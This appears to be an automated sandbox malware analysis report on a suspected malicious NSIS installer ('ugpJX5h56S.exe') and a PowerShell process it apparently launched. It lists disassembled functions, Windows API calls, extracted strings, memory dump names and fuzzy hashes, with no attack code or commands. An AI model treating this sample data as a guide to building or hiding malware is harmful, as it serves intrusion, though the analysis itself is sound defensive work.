Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68

Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401DBF
GetClientRect.USER32(?,?), ref: 00401E0A
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
DeleteObject.GDI32(00000000), ref: 00401E5E

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98

Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0

Strings

!, xrefs: 00401CA4

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98

Function 00404D6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
wsprintfW.USER32 ref: 00404E17
SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A

Strings

%u.%u%s%s, xrefs: 00404DF8

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8

Function 00405E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E10

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED

Function 00402663 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(eksegeternes), ref: 004026BA

Strings

eksegeternes, xrefs: 0040267E, 004026A3, 004026B5, 00402701
lftninger\slangetmmerens, xrefs: 004026A8

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: lstrlen
String ID: eksegeternes$lftninger\slangetmmerens
API String ID: 1659193697-3935130602
Opcode ID: afd31bb821aa055ad9d8af94a6d235f20367bb60df0860ec40d8552edd9562e5
Instruction ID: a3276bd60f4d5d6bb2aa79b2f1cf5674750ecc9aad51c5d7eefbc562b3e224a1
Opcode Fuzzy Hash: afd31bb821aa055ad9d8af94a6d235f20367bb60df0860ec40d8552edd9562e5
Instruction Fuzzy Hash: 7B112B71A10211BBCB00BBB19E469AE3B61AF50348F20443FF402B61C1DAFD8851631E

Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
GetTickCount.KERNEL32 ref: 0040306F
CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
ShowWindow.USER32(00000000,00000005), ref: 0040309A

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C

Function 00405F18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E

Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ugpJX5h56S.exe"), ref: 00405EC9
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6

lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ugpJX5h56S.exe"), ref: 00405F71
GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F81

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-823278215
Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE

Function 0040553A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405569
CallWindowProcW.USER32(?,?,?,?), ref: 004055BA

Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E

Strings

, xrefs: 0040554A

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69

Function 00403B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
GlobalFree.KERNEL32(00000000), ref: 00403B9F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B7E

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8

Function 00405E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72

Strings

C:\Users\user\Desktop, xrefs: 00405E5C

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC

Function 00405F96 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69

Analysis Process: powershell.exePID: 428, Parent PID: 5460COMMON

Executed Functions

Function 0766C2CE Relevance: 64.3, Strings: 50, Instructions: 1844COMMON

Download Yara Rule

Strings

tL1k, xrefs: 0766C388
(f?l, xrefs: 0766BC13
(f?l, xrefs: 0766DA34
(f?l, xrefs: 0766D68C
4<l, xrefs: 0766D5CC
(f?l, xrefs: 0766D6A2
tL1k, xrefs: 0766BBF3
(f?l, xrefs: 0766BD09
(f?l, xrefs: 0766C735
(f?l, xrefs: 0766C3A8
(f?l, xrefs: 0766DE06
tL1k, xrefs: 0766BCE9
(f?l, xrefs: 0766CE50
x.0k, xrefs: 0766C1E9
4<l, xrefs: 0766D5E2
(f?l, xrefs: 0766C9D5
(f?l, xrefs: 0766C79E
tL1k, xrefs: 0766D6F2
(f?l, xrefs: 0766C8E8
tL1k, xrefs: 0766C2FB
(f?l, xrefs: 0766CA70
4']q, xrefs: 0766CCA8
(f?l, xrefs: 0766D594
(f?l, xrefs: 0766DE1C
(f?l, xrefs: 0766C105
(f?l, xrefs: 0766C668
(f?l, xrefs: 0766C939
4']q, xrefs: 0766D779
(f?l, xrefs: 0766C54F
(f?l, xrefs: 0766CACE
(f?l, xrefs: 0766BDD9
-0k, xrefs: 0766D015
(f?l, xrefs: 0766DB90
4']q, xrefs: 0766BF12
-0k, xrefs: 0766C237
(f?l, xrefs: 0766DA1E
(f?l, xrefs: 0766D894
(f?l, xrefs: 0766CDF5
4']q, xrefs: 0766BFB6
(f?l, xrefs: 0766D57E
tL1k, xrefs: 0766C77C
(f?l, xrefs: 0766DBA6
(f?l, xrefs: 0766C09F
4']q, xrefs: 0766CCB4
(f?l, xrefs: 0766C6D6
(f?l, xrefs: 0766CD5F
x.0k, xrefs: 0766DCAD
x.0k, xrefs: 0766CFC4
(f?l, xrefs: 0766C4C1
(f?l, xrefs: 0766D884

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: (f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$(f?l$4']q$4']q$4']q$4']q$4']q$4<l$4<l$tL1k$tL1k$tL1k$tL1k$tL1k$tL1k$x.0k$x.0k$x.0k$-0k$-0k
API String ID: 0-1477421635
Opcode ID: 741a518d01dbaa67b5a1cffeedd0fc0fb8cffddd6f5daf474a24892afedb02f9
Instruction ID: 74dcb7fbe5591326f6174d08ba4bb5cf51ad202756ab88ff7c57f9051e8e29e8
Opcode Fuzzy Hash: 741a518d01dbaa67b5a1cffeedd0fc0fb8cffddd6f5daf474a24892afedb02f9
Instruction Fuzzy Hash: 600395B4B00214DFDB24DB28C994B9EB7B6EF85304F5084A9D91AAB345CB35ED82CF51

Function 0766D0AE Relevance: 43.7, Strings: 34, Instructions: 1234COMMON

Download Yara Rule

Strings

(f?l, xrefs: 0766C668
(f?l, xrefs: 0766BC13
(f?l, xrefs: 0766C939
tL1k, xrefs: 0766BBF3
(f?l, xrefs: 0766BD09
(f?l, xrefs: 0766CACE
(f?l, xrefs: 0766C735
(f?l, xrefs: 0766D41B
(f?l, xrefs: 0766BDD9
(f?l, xrefs: 0766D3BA
-0k, xrefs: 0766D015
4']q, xrefs: 0766BF12
(f?l, xrefs: 0766D1B1
tL1k, xrefs: 0766BCE9
(f?l, xrefs: 0766CE50
x.0k, xrefs: 0766C1E9
